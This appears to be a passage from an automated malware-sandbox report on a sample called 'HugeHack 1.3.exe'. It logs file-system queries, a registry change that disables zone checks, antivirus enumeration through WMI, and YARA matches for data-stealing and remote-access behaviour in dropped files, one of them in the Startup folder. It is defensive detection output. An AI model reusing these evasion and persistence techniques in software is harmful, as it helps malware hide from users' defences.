Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7728 VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\dllhost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\dllhost.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\dllhost.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Roaming\dllhost.exe Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS
Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Payload.exe, 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Wireshark.exe
Source: C:\Users\user\AppData\Roaming\dllhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\dllhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\dllhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: HugeHack 1.3.exe.bin.exe, type: SAMPLE
Source: Yara match File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3698298941.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: HugeHack 1.3.exe.bin.exe PID: 7552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Payload.exe PID: 7616, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED

Remote Access Functionality

Source: Yara match File source: HugeHack 1.3.exe.bin.exe, type: SAMPLE
Source: Yara match File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3698298941.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: HugeHack 1.3.exe.bin.exe PID: 7552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Payload.exe PID: 7616, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED